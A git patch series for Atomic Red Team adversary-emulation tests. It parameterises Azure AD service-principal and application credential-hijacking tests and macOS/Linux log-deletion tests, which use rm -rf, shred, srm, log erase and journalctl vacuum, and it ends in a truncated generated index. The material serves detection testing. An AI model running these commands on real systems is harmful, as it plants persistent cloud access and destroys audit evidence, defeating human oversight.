From f5ce8af9a41dc8fa4a38332d15a0be198f6ba62b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Cl=C3=A9ment=20Notin?= Date: Fri, 2 Jun 2023 17:28:23 +0200 Subject: [PATCH 01/10] No need to export the PFX to get the public certificate, so removed it --- atomics/T1098.001/T1098.001.yaml | 40 +++++++------------------------- 1 file changed, 8 insertions(+), 32 deletions(-) diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml index b203d66d..ff5c5d8d 100644 --- a/atomics/T1098.001/T1098.001.yaml +++ b/atomics/T1098.001/T1098.001.yaml @@ -22,14 +22,6 @@ atomic_tests: description: Name of the targeted service principal type: string default: SuperSP - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: $env:TEMP dependency_executor_name: powershell dependencies: - description: | @@ -49,21 +41,18 @@ atomic_tests: if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" @@ -82,7 +71,6 @@ atomic_tests: } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item - rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore name: powershell elevation_required: false @@ -107,14 +95,6 @@ atomic_tests: description: Name of the targeted application type: string default: SuperApp - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: $env:TEMP dependency_executor_name: powershell dependencies: - description: | @@ -134,21 +114,18 @@ atomic_tests: if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: | @@ -166,7 +143,6 @@ atomic_tests: } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item - rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore name: powershell elevation_required: false - name: AWS - Create Access Key and Secret Key From 96d388114968f47719e341927aa64389cdb1f3dc Mon Sep 17 00:00:00 2001 From: Alex M <58046369+amalone-scwx@users.noreply.github.com> Date: Sun, 4 Jun 2023 09:01:22 -0700 Subject: [PATCH 02/10] parameterize T1070.002 tests for optional non-destructive runs --- atomics/T1070.002/T1070.002.yaml | 195 ++++++++++++++++++++++++++++--- 1 file changed, 176 insertions(+), 19 deletions(-) diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml index 4301a4f3..6dbf67c2 100644 --- a/atomics/T1070.002/T1070.002.yaml +++ b/atomics/T1070.002/T1070.002.yaml @@ -8,10 +8,28 @@ atomic_tests: supported_platforms: - macos - linux + input_arguments: + syslog_path: + description: path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/. + type: String + default: /var/log/sys_T1070.002_1.log + macos_audit_path: + description: path of audit file to delete + type: String + default: /var/audit/20220725213300.202208110700021 + dependency_executor_name: sh + dependencies: + - description: | + target files must exist + prereq_command: | + if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi && stat #{syslog_path} + get_prereq_command: | + touch #{syslog_path} + if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi executor: command: | - sudo rm -rf /private/var/log/system.log* - sudo rm -rf /private/var/audit/* + sudo rm -rf #{syslog_path} + if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi name: sh elevation_required: true - name: Delete log files using built-in log utility @@ -24,7 +42,6 @@ atomic_tests: command: | sudo log erase --all sudo log erase --ttl #Deletes only time-to-live log content - sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log name: sh elevation_required: true - name: Truncate system log files via truncate utility @@ -33,10 +50,23 @@ atomic_tests: This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content supported_platforms: - macos + input_arguments: + system_log_path: + description: path of system log to delete. + type: String + default: /var/log/system.log + dependency_executor_name: sh + dependencies: + - description: | + target files must exist + prereq_command: | + stat #{system_log_path} + get_prereq_command: | + touch #{system_log_path} executor: command: | - sudo truncate -s 0 /var/log/system.log #size parameter shorthand - sudo truncate --size=0 /var/log/system.log #size parameter + sudo truncate -s 0 #{system_log_path} #size parameter shorthand + sudo truncate --size=0 #{system_log_path} #size parameter name: sh elevation_required: true - name: Delete log files via cat utility by appending /dev/null or /dev/zero @@ -45,10 +75,23 @@ atomic_tests: The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility supported_platforms: - macos + input_arguments: + system_log_path: + description: path of system log to delete. + type: String + default: /var/log/system.log + dependency_executor_name: sh + dependencies: + - description: | + target files must exist + prereq_command: | + stat #{system_log_path} + get_prereq_command: | + touch #{system_log_path} executor: command: | - sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes - sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros) + sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes + sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros) name: sh elevation_required: true - name: System log file deletion via find utility @@ -57,11 +100,32 @@ atomic_tests: This test finds and deletes the system log files within /var/log/ directory using various executions(rm, shred, unlink) supported_platforms: - macos + input_arguments: + system_log_name1: + description: name or prefix of system log to delete. + type: String + default: system.log + system_log_name2: + description: name or prefix of system log to delete. + type: String + default: system.log + system_log_name3: + description: name or prefix of system log to delete. + type: String + default: system.log + dependency_executor_name: sh + dependencies: + - description: | + target files must exist + prereq_command: | + stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3} + get_prereq_command: | + touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3} executor: command: | - sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution - sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution - sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution + sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution + sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution + sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution name: sh elevation_required: true - name: Overwrite macOS system log via echo utility @@ -70,9 +134,14 @@ atomic_tests: This test overwrites the contents of system log file with an empty string using echo utility supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: String + default: /var/log/system.log executor: command: | - sudo echo '' > /var/log/system.log + sudo echo '' > #{system_log_path} name: sh elevation_required: true - name: Real-time system log clearance/deletion @@ -81,9 +150,14 @@ atomic_tests: This test reads real-time system log file and writes empty string to it, thus clearing the log file without tampering with the logging process supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: String + default: /var/log/system.log executor: command: | - sudo log -f /var/log/system.log | : > /var/log/system.log + sudo log -f /var/log/system.log | : > #{system_log_path} name: sh elevation_required: true - name: Delete system log files via unlink utility @@ -92,9 +166,22 @@ atomic_tests: This test deletes the system log file using unlink utility supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: String + default: /var/log/system.log + dependency_executor_name: sh + dependencies: + - description: | + target files must exist + prereq_command: | + stat #{system_log_path} + get_prereq_command: | + touch #{system_log_path} executor: command: | - sudo unlink /var/log/system.log + sudo unlink #{system_log_path} name: sh elevation_required: true - name: Delete system log files using shred utility @@ -103,9 +190,22 @@ atomic_tests: This test overwrites the contents of the log file with zero bytes(-z) using three passes(-n 3) of data, and then delete the file(-u) securely supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: String + default: /var/log/system.log + dependency_executor_name: sh + dependencies: + - description: | + target files must exist + prereq_command: | + stat #{system_log_path} + get_prereq_command: | + touch #{system_log_path} executor: command: | - sudo shred -u -z -n 3 /var/log/system.log + sudo shred -u -z -n 3 #{system_log_path} name: sh elevation_required: true - name: Delete system log files using srm utility @@ -116,10 +216,28 @@ atomic_tests: Refer: https://github.com/khell/homebrew-srm/issues/1 for installation supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: String + default: /var/log/system.log + input_arguments: + system_log_folder: + description: path to log parent folder + type: String + default: /var/log/ + dependency_executor_name: sh + dependencies: + - description: | + target files must exist + prereq_command: | + stat #{system_log_path} #{system_log_folder} + get_prereq_command: | + mkdir -p #{system_log_folder} && touch #{system_log_path} #{system_log_folder}/system.log executor: command: | - sudo srm /var/log/system.log #system log file deletion - sudo srm -r /var/log/ #recursive deletion of log files + sudo srm #{system_log_path} #system log file deletion + sudo srm -r #{system_log_folder} #recursive deletion of log files name: sh elevation_required: true - name: Delete system log files using OSAScript @@ -128,9 +246,22 @@ atomic_tests: This test deletes the system log file using osascript via "do shell script"(sh/bash by default) which in-turn spawns rm utility, requires admin privileges supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: String + default: /var/log/system.log + dependency_executor_name: sh + dependencies: + - description: | + target files must exist + prereq_command: | + stat #{system_log_path} + get_prereq_command: | + touch #{system_log_path} executor: command: | - osascript -e 'do shell script "rm /var/log/system.log" with administrator privileges' + osascript -e 'do shell script "rm #{system_log_path}" with administrator privileges' name: sh elevation_required: true - name: Delete system log files using Applescript @@ -141,9 +272,22 @@ atomic_tests: Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: String + default: /var/log/system.log + dependency_executor_name: sh + dependencies: + - description: | + target files must exist + prereq_command: | + stat #{system_log_path} + get_prereq_command: | + touch #{system_log_path} executor: command: | - osascript -e 'tell application "Finder" to delete POSIX file "/var/log/system.log"' + osascript -e 'tell application "Finder" to delete POSIX file "#{system_log_path}"' name: sh elevation_required: true - name: Delete system journal logs via rm and journalctl utilities @@ -152,9 +296,22 @@ atomic_tests: The first sub-test deletes the journal files using rm utility in the "/var/log/journal/" directory and the second sub-test clears the journal by modifiying time period of logs that should be retained to zero. supported_platforms: - linux + input_arguments: + journal_folder: + description: path to journal logs + type: String + default: /var/log/journal + dependency_executor_name: sh + dependencies: + - description: | + target files must exist + prereq_command: | + stat #{journal_folder} + get_prereq_command: | + mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal executor: command: | - sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content + sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place name: sh elevation_required: true From a0e412b7029a2277554123047a32b3840d4baf0b Mon Sep 17 00:00:00 2001 From: Alex M <58046369+amalone-scwx@users.noreply.github.com> Date: Sun, 4 Jun 2023 09:10:55 -0700 Subject: [PATCH 03/10] fix syntax --- atomics/T1070.002/T1070.002.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml index 6dbf67c2..b6ebdccb 100644 --- a/atomics/T1070.002/T1070.002.yaml +++ b/atomics/T1070.002/T1070.002.yaml @@ -221,7 +221,6 @@ atomic_tests: description: path to system.log type: String default: /var/log/system.log - input_arguments: system_log_folder: description: path to log parent folder type: String From 2f0b0d79c18d6211b9e91db294b55b0fa091eff1 Mon Sep 17 00:00:00 2001 From: Alex M <58046369+amalone-scwx@users.noreply.github.com> Date: Sun, 4 Jun 2023 12:56:50 -0700 Subject: [PATCH 04/10] fix default for system.log in 989cc1b1 --- atomics/T1070.002/T1070.002.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml index b6ebdccb..75c07353 100644 --- a/atomics/T1070.002/T1070.002.yaml +++ b/atomics/T1070.002/T1070.002.yaml @@ -12,7 +12,7 @@ atomic_tests: syslog_path: description: path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/. type: String - default: /var/log/sys_T1070.002_1.log + default: /var/log/system.log macos_audit_path: description: path of audit file to delete type: String From 211101b31992d8565f3e514d93c4e2e95d5097dc Mon Sep 17 00:00:00 2001 From: Alex M <58046369+amalone-scwx@users.noreply.github.com> Date: Sun, 4 Jun 2023 13:16:43 -0700 Subject: [PATCH 05/10] fix elevation required on a couple --- atomics/T1070.002/T1070.002.yaml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml index 75c07353..95d4744f 100644 --- a/atomics/T1070.002/T1070.002.yaml +++ b/atomics/T1070.002/T1070.002.yaml @@ -325,7 +325,16 @@ atomic_tests: description: Username of mail spool type: string default: root + dependency_executor_name: sh + dependencies: + - description: | + target files must exist + prereq_command: | + stat /var/spool/mail/#{username} + get_prereq_command: | + touch /var/spool/mail/#{username} executor: + elevation_required: true command: | echo 0> /var/spool/mail/#{username} name: bash @@ -344,3 +353,6 @@ atomic_tests: command: | echo 0> #{log_path} name: bash + elevation_required: true + cleanup_command: | + if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} ; fi From 40fe1f7cf7af74c6095b1d81706cca77e3772462 Mon Sep 17 00:00:00 2001 From: Alex M <58046369+amalone-scwx@users.noreply.github.com> Date: Sun, 4 Jun 2023 13:25:12 -0700 Subject: [PATCH 06/10] change defaults to system_log_name2 and 3 --- atomics/T1070.002/T1070.002.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml index 95d4744f..2ef60683 100644 --- a/atomics/T1070.002/T1070.002.yaml +++ b/atomics/T1070.002/T1070.002.yaml @@ -108,11 +108,11 @@ atomic_tests: system_log_name2: description: name or prefix of system log to delete. type: String - default: system.log + default: system.log.97.gz system_log_name3: description: name or prefix of system log to delete. type: String - default: system.log + default: system.log.98.gz dependency_executor_name: sh dependencies: - description: | From a7cc448291190537dd5e1f0976f714406b74ba5b Mon Sep 17 00:00:00 2001 From: Alex M <58046369+amalone-scwx@users.noreply.github.com> Date: Mon, 5 Jun 2023 20:32:06 -0700 Subject: [PATCH 07/10] arg types lowercase string --- atomics/T1070.002/T1070.002.yaml | 32 ++++++++++++++++---------------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml index 2ef60683..ace7be27 100644 --- a/atomics/T1070.002/T1070.002.yaml +++ b/atomics/T1070.002/T1070.002.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: syslog_path: description: path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/. - type: String + type: string default: /var/log/system.log macos_audit_path: description: path of audit file to delete - type: String + type: string default: /var/audit/20220725213300.202208110700021 dependency_executor_name: sh dependencies: @@ -53,7 +53,7 @@ atomic_tests: input_arguments: system_log_path: description: path of system log to delete. - type: String + type: string default: /var/log/system.log dependency_executor_name: sh dependencies: @@ -78,7 +78,7 @@ atomic_tests: input_arguments: system_log_path: description: path of system log to delete. - type: String + type: string default: /var/log/system.log dependency_executor_name: sh dependencies: @@ -103,15 +103,15 @@ atomic_tests: input_arguments: system_log_name1: description: name or prefix of system log to delete. - type: String + type: string default: system.log system_log_name2: description: name or prefix of system log to delete. - type: String + type: string default: system.log.97.gz system_log_name3: description: name or prefix of system log to delete. - type: String + type: string default: system.log.98.gz dependency_executor_name: sh dependencies: @@ -137,7 +137,7 @@ atomic_tests: input_arguments: system_log_path: description: path to system.log - type: String + type: string default: /var/log/system.log executor: command: | @@ -153,7 +153,7 @@ atomic_tests: input_arguments: system_log_path: description: path to system.log - type: String + type: string default: /var/log/system.log executor: command: | @@ -169,7 +169,7 @@ atomic_tests: input_arguments: system_log_path: description: path to system.log - type: String + type: string default: /var/log/system.log dependency_executor_name: sh dependencies: @@ -193,7 +193,7 @@ atomic_tests: input_arguments: system_log_path: description: path to system.log - type: String + type: string default: /var/log/system.log dependency_executor_name: sh dependencies: @@ -219,11 +219,11 @@ atomic_tests: input_arguments: system_log_path: description: path to system.log - type: String + type: string default: /var/log/system.log system_log_folder: description: path to log parent folder - type: String + type: string default: /var/log/ dependency_executor_name: sh dependencies: @@ -248,7 +248,7 @@ atomic_tests: input_arguments: system_log_path: description: path to system.log - type: String + type: string default: /var/log/system.log dependency_executor_name: sh dependencies: @@ -274,7 +274,7 @@ atomic_tests: input_arguments: system_log_path: description: path to system.log - type: String + type: string default: /var/log/system.log dependency_executor_name: sh dependencies: @@ -298,7 +298,7 @@ atomic_tests: input_arguments: journal_folder: description: path to journal logs - type: String + type: string default: /var/log/journal dependency_executor_name: sh dependencies: From 546ed5ea1e4be91e8de1e9f2645071fb1b0a3c30 Mon Sep 17 00:00:00 2001 From: Alex M <58046369+amalone-scwx@users.noreply.github.com> Date: Fri, 9 Jun 2023 13:05:25 -0700 Subject: [PATCH 08/10] backout changes to log -f --- atomics/T1070.002/T1070.002.yaml | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml index ace7be27..c58d7d06 100644 --- a/atomics/T1070.002/T1070.002.yaml +++ b/atomics/T1070.002/T1070.002.yaml @@ -150,14 +150,9 @@ atomic_tests: This test reads real-time system log file and writes empty string to it, thus clearing the log file without tampering with the logging process supported_platforms: - macos - input_arguments: - system_log_path: - description: path to system.log - type: string - default: /var/log/system.log executor: command: | - sudo log -f /var/log/system.log | : > #{system_log_path} + sudo log -f /var/log/system.log | : > /var/log/system.log name: sh elevation_required: true - name: Delete system log files via unlink utility From 49e9c5e04e0eb82a7dda938cda7b7f87730c7a6d Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Fri, 9 Jun 2023 22:36:42 +0000 Subject: [PATCH 09/10] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/azure-ad-index.yaml | 44 +++++++---------------------- atomics/Indexes/index.yaml | 44 +++++++---------------------- atomics/T1098.001/T1098.001.md | 28 ++++++------------ 3 files changed, 28 insertions(+), 88 deletions(-) diff --git a/atomics/Indexes/azure-ad-index.yaml b/atomics/Indexes/azure-ad-index.yaml index 43a59236..e3f59826 100644 --- a/atomics/Indexes/azure-ad-index.yaml +++ b/atomics/Indexes/azure-ad-index.yaml @@ -37535,14 +37535,6 @@ persistence: description: Name of the targeted service principal type: string default: SuperSP - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: "$env:TEMP" dependency_executor_name: powershell dependencies: - description: 'AzureAD module must be installed. @@ -37566,21 +37558,18 @@ persistence: if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -37593,8 +37582,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false - name: Azure AD Application Hijacking - App Registration @@ -37618,14 +37606,6 @@ persistence: description: Name of the targeted application type: string default: SuperApp - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: "$env:TEMP" dependency_executor_name: powershell dependencies: - description: 'AzureAD module must be installed. @@ -37649,21 +37629,18 @@ persistence: if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -37676,8 +37653,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false T1053.004: diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index d7b4d4e8..b8224d2f 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -62806,14 +62806,6 @@ persistence: description: Name of the targeted service principal type: string default: SuperSP - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: "$env:TEMP" dependency_executor_name: powershell dependencies: - description: 'AzureAD module must be installed. @@ -62837,21 +62829,18 @@ persistence: if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null + 